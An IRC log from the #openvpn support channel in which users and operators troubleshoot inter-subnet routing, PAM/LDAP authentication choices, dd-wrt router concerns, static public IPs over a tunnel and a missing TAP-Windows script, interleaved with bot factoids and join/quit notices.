<@dazo> okay good! :) 07:58 < havoc> we do it at work; ovpn & cisco 07:58 <@dazo> on Windows or *nix-ish? 07:58 < havoc> lot of the devs have several vpn clients on their machines 07:58 < havoc> windows 07:58 <@dazo> cool! That's enough confidence for me to claim it should work :) 07:59 < havoc> but it all depends on configs, of course 07:59 < havoc> but I can say, positively, that it *can* work 07:59 -!- catsup [~d@64.111.123.163] has joined #openvpn 07:59 <@dazo> yeah, that's normal ... just wanted to be ensure that a support engineer requiring cisco for his work can connect to a openvpn network I control 07:59 < havoc> ah 08:00 < havoc> other potential issues are [non-]admin related, UAC, etc... 08:00 <@dazo> yupp 08:00 * dazo will soon discover how clever that support engineer really is 08:00 <@dazo> :) 08:01 < havoc> we have a mix of RRAS, OpenVPN, Cisco, CheckPoint, SonicWall clients on a lot of the devs' machines 08:02 < havoc> some don't play nice together, but that's because of the configs 08:04 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 244 seconds] 08:05 -!- b1rkh0ff [~b1rkh0ff@178.77.21.150] has quit [Ping timeout: 245 seconds] 08:06 -!- catsup [~d@64.111.123.163] has joined #openvpn 08:11 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 240 seconds] 08:12 -!- catsup [~d@64.111.123.163] has joined #openvpn 08:16 < sam1> um, anyone running openvpn with openvpn-auth-ldap on debian squeeze stable? 08:17 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 256 seconds] 08:18 -!- catsup [~d@64.111.123.163] has joined #openvpn 08:19 -!- b1rkh0ff [~b1rkh0ff@178.77.13.80] has joined #openvpn 08:24 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 260 seconds] 08:25 -!- catsup [~d@64.111.123.163] has joined #openvpn 08:31 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 252 seconds] 08:31 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 08:32 -!- catsup [~d@64.111.123.163] has joined #openvpn 08:34 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 08:37 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 244 seconds] 08:38 -!- catsup [~d@64.111.123.163] has joined #openvpn 08:39 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 08:39 -!- nickanderson_afk is now known as nickanderson 08:44 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 252 seconds] 08:44 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has joined #openvpn 08:45 -!- catsup [~d@64.111.123.163] has joined #openvpn 08:46 < Jonathan__> !welcome 08:46 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 08:46 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 08:46 -!- bjh4 [~bjh4@12.239.198.1] has joined #openvpn 08:46 < Jonathan__> !redirect 08:46 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 08:46 <@vpnHelper> http://ircpimps.org/redirect.png 08:47 < Jonathan__> !dns 08:47 <@vpnHelper> "dns" is (#1) Level3 open recursive DNS server at 4.2.2.[1-6] or (#2) Google open recursive DNS server at 8.8.8.8 / 8.8.4.4 or (#3) you might be looking for !pushdns 08:48 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has quit [Client Quit] 08:48 -!- Jonathan__ [~Jonathan@173.212.224.54] has joined #openvpn 08:49 < fys> there's always money in the banana stand. 08:50 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 260 seconds] 08:51 -!- catsup [~d@64.111.123.163] has joined #openvpn 08:54 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 08:54 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 09:02 -!- Porkepix [~Porkepix@157.138.189.185] has quit [Quit: Computer has gone to sleep.] 09:04 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 09:05 < Eagleman> I am trying to setup a scope so i will be able to acces my tcp network ( also OpenVPN ) on 10.8.1.0 However i am unable to ping 10.8.1.2 but i am able to ping 10.8.1.1, I am sure that the client on 10.8.1.2 is connected: http://pastebin.com/E21Y5VxG 09:06 < Eagleman> 10.8.0.0 is my UDP network 09:16 -!- danharibo [~dan@razor-studios.co.uk] has left #openvpn ["WeeChat 0.3.4"] 09:16 < Eagleman> log: http://pastebin.com/YwMGwZDs 09:16 < Eagleman> Some one here? 09:21 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has quit [Quit: Leaving] 09:33 <@ecrist> !configs 09:33 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 09:34 <@ecrist> and that log pastebin is horseshit 09:34 <@ecrist> do a better copy/paste 09:35 -!- Eagleman7 [~Eagleman@vpn.eagleman.net] has joined #openvpn 09:37 < Eagleman7> client: http://pastebin.com/GTz6qwPS serverlog: http://pastebin.com/0QXT5QKJ clientlog: http://pastebin.com/LzQiK3V1 09:38 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 248 seconds] 09:42 < Eagleman7> This should do it all in one and comments removed: http://pastebin.com/wFSQf1H3 09:44 < Eagleman7> !log 09:44 <@vpnHelper> Error: You don't have the owner capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified. 09:46 <@ecrist> what are you trying to do? 09:46 <@ecrist> !gload 09:46 <@ecrist> !goal 09:46 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 09:47 < Eagleman7> I want to reach my other vpn network running on 10.8.1.0 ( TCP ) from my 10.8.0.0 network 09:48 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 09:49 < Eagleman> Lost my connection, last message: [16:39] I want to reach my... 09:51 -!- Eagleman7 [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 256 seconds] 09:52 -!- KaiForce [~chatzilla@adsl-70-228-90-247.dsl.akrnoh.ameritech.net] has joined #openvpn 09:52 -!- Jonathan__ [~Jonathan@173.212.224.54] has quit [Ping timeout: 264 seconds] 09:54 <@ecrist> do you have ip_forwarding enabled in the kernel? 09:54 < Eagleman> yes 09:54 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 09:54 <@ecrist> you have route, but you also need to push that route 09:54 <@ecrist> so, you need push "route 10.8.1.0 255.255.255.0" in your config 09:54 -!- mattock is now known as mattock_afk 09:55 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has joined #openvpn 09:55 < Eagleman> Thats done in the ccd config 09:56 <@ecrist> I don't see a CCD config in your pastebin 09:56 <@ecrist> why would you do it there? 09:57 < Eagleman> nevermind, i just follow what you are saying 09:57 < Eagleman> Ok, thats done, now i got another route on my windows system: 10.8.1.0 255.255.255.0 10.8.0.1 10.8.0.5 30 09:57 < Eagleman> However i am still not able to ping my other client 10.8.1.2 09:58 < Eagleman> traceroute shows me that it is going to 10.8.0.1 but then i am getting: Request timed out. 09:59 <@ecrist> does the other client know how to route to 10.8.0.1? 10:00 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 246 seconds] 10:00 < Eagleman> 10.8.0.0 * 255.255.255.0 U 0 0 0 tun3 10:00 < Eagleman> 10.8.1.0 10.8.0.1 255.255.255.0 UG 0 0 0 tun3 10:00 < Eagleman> 10.8.1.0 * 255.255.255.0 U 0 0 0 tun4 10:00 < Eagleman> Thats on 10.8.1.2 10:00 < Eagleman> 10.8.1.2 is also 10.8.0.2 10:01 < Eagleman> eagleman.net is connected to vpn.eagleman.net with 2 connections: UDP: 10.8.0.2 TCP: 10.8.1.2 10:03 < Eagleman> So yes it does know the route to 10.8.0.1 Ping succeeded 10:05 <@ecrist> that's retarded 10:06 < Eagleman> The double client connection on eagleman.net? 10:06 <@ecrist> why are you connected both via TCP and UDP? 10:06 <@ecrist> yes 10:07 < Eagleman> So i am able to reach my server using tcp and udp when connected to either one of these when connected to vpn.eagleman.net 10:07 < Eagleman> That was the idea 10:07 <@ecrist> I don't think it's a good idea to be connected to both 10:07 <@ecrist> you're going to have conflicting routes 10:08 <@ecrist> so, you're using a single client to ping itself from one VPN subnet to the other, right? 10:08 < Eagleman> So lets say i am only connected to udp on eagleman.net 10:08 < Eagleman> How am i able to reach eagleman.net from vpn.eagleman.net when connected with tcp? 10:08 <@ecrist> I don't understand your question 10:08 <@ecrist> !diagram 10:08 <@vpnHelper> "diagram" is You can use a site such as http://gliffy.com to create a network diagram as well as programs such as Visio, Dia, or OmniGraffle 10:10 < Eagleman> I will be back when i have my topology 10:15 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 255 seconds] 10:17 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 240 seconds] 10:19 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 10:23 -!- AsadH is now known as zz_AsadH 10:25 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 10:39 -!- Porkepix [~Porkepix@157.138.191.104] has joined #openvpn 10:39 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 10:45 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 10:51 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 10:55 -!- mattock_afk is now known as mattock 11:05 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 11:09 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 11:09 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 11:09 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 11:09 -!- mode/#openvpn [+o krzee] by ChanServ 11:09 -!- zz_AsadH is now known as AsadH 11:24 -!- Porkepix [~Porkepix@157.138.191.104] has quit [Quit: Computer has gone to sleep.] 11:37 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 11:37 -!- mode/#openvpn [+v s7r] by ChanServ 11:41 < Jonathan__> Good afternoon 11:43 < Jonathan__> I have a question. I currently have 5 servers running OpenVPN in various places of the world. All using LDAP authentication and individual certs for client authentication. 11:44 < Jonathan__> Currently, when a user authenticates with my server, they are assigned the default WAN IP for internet traffic routing. I know you can assign static WAN IPs using ccd, but is there a way to assign WAN IPs on a round robin basis? 11:44 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Ping timeout: 245 seconds] 11:44 < Jonathan__> I'd like to be able to use more than one WAN IP per server for my clients without forcing them to a specific static IP each time 11:46 < Jonathan__> forcing a static IP in my opinion takes away some of the anonymity associated with my services 11:56 < Jonathan__> also, has anyone attempted to store client keys in ldap? 11:56 -!- AsadH is now known as zz_AsadH 12:21 -!- idlecool [~i@sd.gs] has quit [Remote host closed the connection] 12:24 -!- idlecool [~i@sd.gs] has joined #openvpn 12:40 < Pei> you guys rock 12:40 < Pei> thanks for all the help 12:44 -!- zz_AsadH is now known as AsadH 12:44 -!- nickanderson is now known as nickanderson_afk 12:46 -!- cmelbye [~charlie@yourwiki/staff/charlie] has quit [Ping timeout: 255 seconds] 12:47 -!- cmelbye [~charlie@yourwiki/staff/charlie] has joined #openvpn 12:49 -!- dgbaley27 [~matt@ucb-np1-210.colorado.edu] has joined #openvpn 12:50 < dgbaley27> Hey. I've been using OpenVPN for a while now for personal use. I'm now using it in a larger environment. I'd like to switch from certificates to LDAP (via PAM). 12:51 < dgbaley27> Does anyone have any comments in particular on doing this? Do I still use the TA key? 12:51 < dgbaley27> I basically just want to be able to add people to the "openvpn" group in LDAP in order to give them access. 12:52 < dgbaley27> Is there any reason I should use the LDAP plugin directly? I like the flexibility that PAM has to offer (can add local accounts too), and the passwords are actually krb5 12:54 < dgbaley27> Also, does the warning under --client-cert-not-required still apply as I'm not using a home-grown script but a pam plugin which I think is provided by openvpn itself 12:58 -!- ade_b [~Ade@host-78-65-176-137.homerun.telia.com] has joined #openvpn 12:58 -!- ade_b [~Ade@host-78-65-176-137.homerun.telia.com] has quit [Changing host] 12:58 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 13:10 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Ping timeout: 245 seconds] 13:15 -!- DBordello [~DBordello@unaffiliated/dbordello] has quit [Ping timeout: 245 seconds] 13:19 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds] 13:21 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 13:23 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 13:25 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Excess Flood] 13:28 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 13:33 -!- gladiatr [~sdspence@24.124.15.166] has joined #openvpn 13:33 -!- gladiatr [~sdspence@24.124.15.166] has quit [Changing host] 13:33 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn 13:38 -!- kothog [~kothog@unaffiliated/kothog] has quit [Ping timeout: 246 seconds] 13:44 -!- kothog [~kothog@unaffiliated/kothog] has joined #openvpn 13:46 < Jonathan__> dgbaley: I am using OpenLDAP for authentication. Using PHPLDAPAdmin as the admin interface for managing users 13:46 < Jonathan__> I still require individual certs/keys as a second step of authentication 13:53 < dgbaley27> Hmm, wouldn't that really be the first step them? In any event, that seems like a PITA, how do you distribute keys? 14:02 -!- p3rror [~mezgani@2001:0:53aa:64c:3863:5e7c:d670:1b82] has joined #openvpn 14:04 <@dazo> dgbaley27: you will always need server sertificates to make it possible to use a multi-peer mode on the server ... but read carefully the section about --client-cert-not-required in the man page 14:06 <@dazo> Jonathan__: WAN IP addresses!? ... I know what WAN IPs are ... but I don't understand why you use that with VPN .... 14:06 <@dazo> or do you use --redirect-gateway ... and VPN clients use your WAN IP as their public IP? 14:07 < havoc> gah, what happened to the "create TAP adpater" script? 14:07 < havoc> (on windows) 14:07 * dazo looks for mattock .... 14:07 <@ecrist> there was a problem with the windows build 14:07 < Jonathan__> Dazo: I offer a small VPN service for individuals to mask their true IPs 14:07 <@ecrist> mattock supposedly fixed it 14:07 < havoc> ecrist: ah 14:07 < havoc> I guess I can roll out 2.2.2 still 14:08 < Jonathan__> dazo: I just dont want all my users using the same public IP, nor do I wish to force static IPs 14:08 < havoc> ecrist: I've been playing w/ silent deployment of ovpn 14:08 <@dazo> Jonathan__: okay ... then you that's a NAT setup you need to figure out ... not really related to OpenVPN ... so, if you use Linux/iptables then you might get some better answers on #netfilter 14:09 <@dazo> havoc: I blame mattock for this one ;-) ... he did talk about rolling out a new 2.3 windows installer though 14:09 -!- corretico [~luis@190.211.93.38] has quit [Read error: Connection reset by peer] 14:09 < dgbaley27> dazo: I know that I still need the server side certificates. But I wouldn't be using auth-user-pass-verify, I'd be using plugin openvpn-auth-pam.so 14:09 < havoc> dazo: ok, no biggie though, 2.2.2 is fine for what I'm looking for 14:09 < Jonathan__> dazo I was lookingat using client connect and disconnect scripts 14:09 < Jonathan__> to setup NAT 14:09 < Jonathan__> just looking for some direction I guess, I know its not openvpn product related 14:09 -!- corretico [~luis@190.211.93.38] has joined #openvpn 14:10 -!- p3rror [~mezgani@2001:0:53aa:64c:3863:5e7c:d670:1b82] has quit [Ping timeout: 245 seconds] 14:10 <@dazo> Jonathan__: if you want truly randomisation .... then I'd say firewall rules are the proper place ... otherwise, you need to look at the --learn-address script hook ... that's called when the VPN IP address is set or changed 14:10 -!- DBordello [~DBordello@2607:ff50:0:1a::10] has joined #openvpn 14:10 -!- DBordello [~DBordello@2607:ff50:0:1a::10] has quit [Changing host] 14:10 -!- DBordello [~DBordello@unaffiliated/dbordello] has joined #openvpn 14:10 -!- p3rror [~mezgani@2001:0:53aa:64c:3055:5e7c:d606:f58d] has joined #openvpn 14:11 <@dazo> dgbaley27: that's basically the same .... the point is without username/pass auth ... you have a completely anonymous tunnel which anyone can connect to 14:11 <@dazo> dgbaley27: that is if you set --client-certs-not-required on the server 14:12 < dgbaley27> dazo: sure, but what I plan on is certs-not-required and plugin openvpn-auth-pam, so there shouldn't be anonymous access 14:12 <@dazo> that's what I'm saying 14:15 < dgbaley27> dazo: guh, just to be sure: client-certs-not-required and plugin openvpn-auth-pam is a secure setup without anonymous access, correct? 14:17 <@dazo> dgbaley27: yes. However, openvpn-auth-pam + certs are even safer, but you don't want that ... but both are fine 14:17 < dgbaley27> I don't want to do it just because I don't have a scalable way to generate user keys, and can't rely on them being able to send me proper CSR's 14:18 < dgbaley27> scalable or safe* 14:20 < dgbaley27> I don't think it's relevant to this discussion, but this is more of an access setup. The traffic itself doesn't really need to be secure, I can rely on the end-to-end principle for that. 14:21 <@dazo> well, that makes it possible to lower the security a bit without loosing your sleep ... but the overall security isn't stronger than the weakest link 14:23 < dgbaley27> But where is the weak link? Assuming the CA is trusted, the connection is secure and the endpoint is trusted (from the clients' perspective) before the password is exchanged. 14:24 <@dazo> the connection is only as secure as the authentication is secure 14:24 <@dazo> without client certs, you're more vulnerable to bruteforce attacks 14:24 -!- p3rror [~mezgani@2001:0:53aa:64c:3055:5e7c:d606:f58d] has quit [Ping timeout: 245 seconds] 14:24 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 276 seconds] 14:25 <@dazo> bruteforce on the username/password that is 14:25 <@krzee> and password re-use issues 14:25 <@dazo> oh true 14:25 <@krzee> which is WAY more common than most non-hackers give credit to 14:27 < dgbaley27> Well, password issues and brute-force attacks aren't really my issue in this setup =). Each host on the network is secured via the same kerberos system, which is not under my control. 14:28 <@dazo> ehm .... anyone having a public service available, requiring username/passwords, can experience bruteforce attacks 14:29 <@dazo> ever had a public server responding to ssh on port 22 ... and ever checked the log file ssh uses? 14:30 <@krzee> like within minutes of installing 14:30 <@krzee> the internet is so dirty dirty 14:30 <@krzee> toss up a honeypot sometime, its a nasty nasty place 14:31 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn 14:31 -!- mode/#openvpn [+o pekster] by krzee 14:32 <@dazo> dgbaley27: on almost all my openvpn setups I use certs, auth-user-pass and tls-auth ... just to ensure that only the users I control are able to connect ... not that the data itself is that sensitive, but I don't want to open up a door for anyone else ..... but people do also call me paranoid ;-) 14:33 * dazo even wrote his own openvpn auth plug-in, as he found auth-pam or auth-ldap too simple 14:33 <@krzee> without a healthy does of paranoia you'd be doing it wrong! 14:33 <@krzee> anyone who disagrees should throw up a decent honeypot sometime 14:34 <@krzee> heh 14:34 <@dazo> heh :) 14:34 <@krzee> and of course, none of that is targeted 14:35 <@krzee> http://www.comedycentral.com/video-clips/az3sy8/chappelle-s-show-if-the-internet-was-a-real-place 14:35 <@vpnHelper> Title: If the Internet Was a Real Place - Video Clip | Comedy Central (at www.comedycentral.com) 14:35 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has joined #openvpn 14:36 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Remote host closed the connection] 14:37 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has joined #openvpn 14:37 < lickalott> !welcome 14:37 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 14:37 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 14:37 < lickalott> !goal 14:37 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 14:38 < lickalott> Gents, i just dd-wrt'd my router and would like to enable openvpn on it. is this the chan I should be seeking help in? 14:39 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 14:39 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 14:39 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 14:39 -!- mode/#openvpn [+o krzee] by ChanServ 14:39 <@dazo> lickalott: yeah ... but dd-wrt ... seriously? that's a security risk itself 14:39 < lickalott> thoughts? 14:40 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Remote host closed the connection] 14:40 < lickalott> i wanted to build a pfsense box but don't have the funds for the hardware att. 14:40 <@dazo> lickalott: it exists a database over all ssh/https keys used in all dd-wrt distributions 14:40 <@dazo> lickalott: and the dd-wrt developers didn't see that as a problem 14:41 < lickalott> I have the AS running on my ubuntu server and have access to the network from outside, but i wanted it on my router. 14:41 < lickalott> openwrt doesn't work for my model. Is there another alternative i should be looking into? 14:41 <@dazo> lickalott: and I discovered a hard-coded iptables rule in one version ... and users was never warned about it ... "just wait for the next release which have no ETA for the fix" was the developers response 14:41 < lickalott> nice 14:41 <@dazo> lickalott: if openwrt don't work ... hmmm .... maybe tomato 14:42 < lickalott> i don't have a wrt54g anymore 14:42 <@dazo> what do you have now? 14:42 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 14:43 < lickalott> E3200 14:44 < lickalott> you think it would be safer to leave the stock FW on the router and just continue to run the AS off of the ubuntu machine? 14:45 < defsdoor> dazo, you dd-wrt comments concern me - I've just rolled out a buffalo dd-wrt to our manchester office - to replace a checkpoint firewall piece of junk 14:45 <@dazo> in fact, I'd probably place the ubuntu box in front, with proper firewalling + openvpn (community or AS) 14:45 <@dazo> defsdoor: I'll see if I can find the threads again 14:46 < defsdoor> we pay a fortune for our checkpoint gateways and they dont even do QoS 14:46 < defsdoor> so I'm binning them 14:46 < defsdoor> and the many thousands a year support costs 14:47 <@dazo> defsdoor: I know some companies ship TP-Link WR1043ND with openwrt ... I've set up a few myself, and that's cheap and reasonably good hardware 14:47 <@dazo> however ... the later hw versions have some wireless driver issues ... but I haven't tried newer openwrt firmwares in a while 14:48 -!- bjh4 [~bjh4@12.239.198.1] has quit [Remote host closed the connection] 14:50 < neilhwatson> We need a rasberry-router :) 14:50 <@dazo> heh 14:51 < defsdoor> I have 2 pis - running an led string clock off one right now 14:51 <@dazo> neilhwatson: tbh ... the tp-link gets pretty close to that 14:51 <@dazo> (in hackability, that is) 14:55 < neilhwatson> Openvpn question: Connecting a client to a servers, where the server will act as a gw for the client. Does the server need one IP for eth0 and a second IP for tun? 14:55 < defsdoor> well I can install openwrt on these buffalos by the look of it 14:55 < defsdoor> I've just ordered one for home so I will give it a go 14:55 < neilhwatson> buffalo? 14:55 <@dazo> neilhwatson: it needs an IP for the eth where the traffic will go out (if you do NAT) ... but it really don't need an IP on the tun device, if your clients support routing by device 14:56 < neilhwatson> Server will not NAT. 14:58 < neilhwatson> In example config files I"ve seen 'server '. I preume that denotes the tunnel end points. Should one of those IP's be the eth0 on the server? 14:58 < defsdoor> nope 14:58 < defsdoor> just pick a private unlikely to clash subnet 14:59 < rob0> I bet you will need a tun0 IP address, for routing. Then you can use proxy ARP for clients, with no NAT. 14:59 < defsdoor> (unlikely to clash with any other private subnet you may use) 15:01 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has quit [Ping timeout: 276 seconds] 15:01 -!- EugeneKay [EugeneKay@madeitwor.se] has quit [Ping timeout: 276 seconds] 15:01 < neilhwatson> No NAT or private IP's involved. I want client with public IP to have another public IP on the same subnet as the server. 15:02 <@dazo> neilhwatson: I don't know if I remember it correctly ... but I believe Jan Just Keijser wrote about that in his OpenVPN 2 Cookbook 15:02 <@dazo> !book 15:02 <@vpnHelper> "book" is http://www.packtpub.com/openvpn-2-cookbook/book check out JJK's awesome cookbook for openvpn 2! 15:02 -!- EugeneKay [eugene@madeitwor.se] has joined #openvpn 15:02 <@dazo> that's a really difficult setup though 15:02 <@dazo> with many pitfalls 15:03 <@dazo> or let me think .... 15:03 < defsdoor> if it's all public IPs when not just alias the ip on server A and forward the traffic to server B ? 15:03 <@dazo> maybe you can do SNAT/DNAT .... traffic coming from the VPN gets a specific NATed IP address 15:04 <@dazo> and then you can port-nat incoming traffic to the server's IP subnet to the VPN clients, if you need that direction 15:04 < neilhwatson> The client's public IP is dynamic. I want to use the tunel to give it a static from the server's network. 15:04 <@dazo> ahh, okay 15:04 < defsdoor> messy routing shenanigans needed though 15:04 <@dazo> that's a bit different ... and I do basically the same in one of my setups 15:05 < neilhwatson> I"d make the tunnel the dgw. 15:05 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has joined #openvpn 15:05 < defsdoor> you cant 15:05 <@dazo> I have a mail server on a network with dynamic IPs ... and a virtual server hosted somewhere with a static IP 15:05 < defsdoor> else outside the tunnel wont route (the tunnel itself) 15:05 < defsdoor> you'll need to do connection tracked routing 15:06 <@dazo> then I have DNAT/SNAT rules on the VPN server (the VM) which redirects all connections on selected ports to the VPN IP of the mail server 15:06 < neilhwatson> Go back to 'you can't' WHy is that? 15:07 <@dazo> but I needed some tweaking on the mail server, with ip routing tables ... so that the traffic from the VPN would be replied to via the VPN as well 15:07 < hg_5> how to install 2 tap windows adapters? 15:08 <@dazo> hg_5: run the addtap.bat script in the OpenVPN\bin directory 15:08 < defsdoor> neilhwatson, well - unless you are ok with 100% of traffic going that way and a single specific route to your server's public IP via the primary gw 15:08 < hg_5> dazo i dont have this 15:08 < neilhwatson> The first part yet. The second part I don't follow. 15:08 < hg_5> in this directory 15:08 -!- p3rror [~mezgani@41.140.153.11] has joined #openvpn 15:08 <@dazo> hg_5: OpenVPN 2.3? 15:08 < hg_5> dazo yes 15:09 < defsdoor> neilhwatson, if you change the default gateway the tunnel will go down that gateway - or try to 15:09 <@dazo> hg_5: ahh, okay .... mattock ^^^^ see hg_5 ... need that fixed very soon now! 15:09 < defsdoor> which will obviously fail as it needs to go via internet to that server 15:09 < hg_5> dazo what? 15:09 < havoc> dazo: heh, I guess other ppl need it too ;) 15:09 <@dazo> hg_5: the windows installer failed to install that script .... and we're waiting on a new installer 15:09 <@dazo> mattock is the guy who built the installer 15:10 < defsdoor> neilhwatson, I do something similar at work to change my default gateway of my desktop pc to go via a vpn to my home server 15:10 < defsdoor> so I need static routes to my home server via the physical gateway 15:10 < hg_5> dazo oh, when it will be available? 15:10 < neilhwatson> I'm sure I"ve read examples of using openvpn to route all traffic, which I assume acts as a default gateway, on untrusted networks. 15:11 < defsdoor> neilhwatson, it's perfectly simple to do - but you will need a static route to the internet facing IP of the other end of the tunnel 15:12 < defsdoor> via the physical/initial gw 15:12 < rob0> dazo, I posted about the proxy ARP way to "have a public IP at home" on the list some years ago, IIRC before JJK's book. :) 15:12 < neilhwatson> That makes sense. 15:12 <@dazo> rob0: maybe that's where JJK took the inspiration from? ;-) 15:13 < neilhwatson> Back to the number of required IP's. Does the server tun need an address? 15:13 < rob0> I used an RFC 1918 address for the server tun0, and that address could be the new gateway for the clients. 15:13 -!- batrick [~batrick@nmap/developer/batrick] has quit [Ping timeout: 245 seconds] 15:14 <@dazo> hg_5: which .exe/.com files do you have in the OpenVPN bin directory? 15:15 < rob0> dazo, ha! I even used the work "cookbook". This was 2005, http://openvpn.net/archive/openvpn-users/2005-09/msg00108.html 15:15 < hg_5> dazo http://puu.sh/1XwE6 15:15 <@vpnHelper> Title: [Openvpn-users] openvpn cookbook: get a static IP at home (at openvpn.net) 15:15 < rob0> s/work/word/ 15:15 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has quit [Excess Flood] 15:15 <@dazo> hg_5: okay ... a lot more is missing there it seems 15:15 -!- simcop2387 [~simcop238@simcop2387.info] has joined #openvpn 15:15 -!- simcop2387 [~simcop238@simcop2387.info] has quit [Changing host] 15:15 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has joined #openvpn 15:15 <@dazo> hg_5: it's all related to the TAP driver installation ... the TAP tools haven't been installed 15:15 < neilhwatson> Shouldn't the client tun be the gw, but with a static route to the server's public iP? 15:16 < hg_5> where are tap tools? 15:16 <@dazo> hg_5: can you try to install this one? http://swupdate.openvpn.org/community/releases/tap-windows-9.9.2.exe 15:17 < rob0> neilhwatson, read the whole thread, or at least the first followup which corrects an oversight in the original post. 15:18 <@dazo> hg_5: you'll then get in your Programfiles directory a TAP-Windows\bin directory with addtap.bat 15:18 < rob0> I assume since you mention eth0/tun0, you are using Linux, in which case this is exactly what you seem to be after. 15:18 < hg_5> dazo yeah great thanks it has been installed! :) 15:19 -!- batrick [~batrick@nmap/developer/batrick] has joined #openvpn 15:20 <@dazo> rob0: that summarises very well my setup :) ... and I vaguely remember this info from when you helped me with it too 15:22 < neilhwatson> rob0, thanks for the url 15:23 <@dazo> havoc: seems installing this one manually helps out 